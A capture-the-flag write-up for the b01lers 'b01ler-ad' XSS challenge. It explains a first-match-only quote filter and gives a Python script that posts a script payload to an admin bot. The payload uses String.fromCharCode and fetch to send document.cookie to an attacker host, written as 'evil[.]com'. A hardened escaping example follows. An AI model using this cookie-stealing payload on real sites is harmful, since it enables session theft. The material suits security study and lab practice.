Tags: web xss
# web/b01ler-ad
> Ads Ads Ads! Cheap too! You want an Ad on our site? Just let us know!
`http://b01ler-ads.hammer.b01le.rs`
XSS challenge: we can submit any HTML we want and the admin visits it, but the content should not contain single quotes, double quotes or backticks. From the main challenge code:
```js
const content = req.body.content.replace("'", '').replace('"', '').replace("`", '');
const urlToVisit = CONFIG.APPURL + '/admin/view/?content=' + content;
```
We can build the URL string with `String.fromCharCode` (converter: https://charcode98.neocities.org/) to avoid using quotes, and URL-encode our payload before sending it to the admin. The admin then visits our site with their cookies in the query.
```python
import requests
url = 'http://b01ler-ads.hammer.b01le.rs/review'
# Readable form of the payload: fetch('evil[.]com?cookie=' + document.cookie)
payload = """
<script>
var url = String.fromCharCode(104, 116, 116, 112, 58...)
fetch(url+ encodeURI(document.cookie))
</script>
"""
# URL-encoded copy of the payload; the server concatenates content into the admin URL without encoding it
encoded = "%3Cscript%3E%0A%20%20%20%20let%20url%20%3D%20String%2EfromCharCode%28104%2C%20116%2C%20116%2C%20112%2C%2058%2E%2E%2E%29%0A%20%20%20%20fetch%28url%20%20encodeURI%28document%2Ecookie%29%29%0A%3C%2Fscript%3E"
data = {
    'content': encoded
}
r = requests.post(url, data=data)
print(r.text)
```
![listener](https://xeunwa.github.io/b01lers-2024/image.png)
**flag**: bctf{wow_you_can_get_a_free_ad_now!}
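
The filter from the challenge source next to a hardened form, as an added example (not part of the challenge or the original writeup). `escapeHtml`, `buildAdminUrl` and the host `app.example` are assumptions, as is the premise that the admin view only needs to show the ad as text.

```javascript
// Added example. challengeFilter copies the writeup's filter; escapeHtml and
// buildAdminUrl are hypothetical helpers, and app.example is a placeholder host.

// A string pattern makes replace() act on the first match only, and the filter
// never touches < or >, so quote-free markup passes through unchanged.
function challengeFilter(content) {
  return content.replace("'", '').replace('"', '').replace("`", '');
}

// Hardened output step: escape every HTML-significant character, globally,
// before the value is written into the admin page.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(s).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Hardened URL step: let the URL API percent-encode the query parameter
// instead of concatenating raw user input into the URL.
function buildAdminUrl(appUrl, content) {
  const u = new URL('/admin/view/', appUrl);
  u.searchParams.set('content', content);
  return u.toString();
}

// Constructed sample inputs.
const quoted = `<b title="a" id="b">it's 'ok'</b>`;
const quoteFree = '<script>x=String.fromCharCode(104)</script>';

console.log(challengeFilter(quoted));                  // quotes remain after the first of each kind
console.log(challengeFilter(quoteFree) === quoteFree); // filter is a no-op on quote-free markup
console.log(escapeHtml(quoteFree));                    // rendered as inert text
console.log(buildAdminUrl('http://app.example', 'a&b=<c>'));
```

If ads have to keep their markup, escaping does not fit and an allow-list HTML sanitizer is needed; marking the session cookie `HttpOnly` keeps it out of `document.cookie` either way.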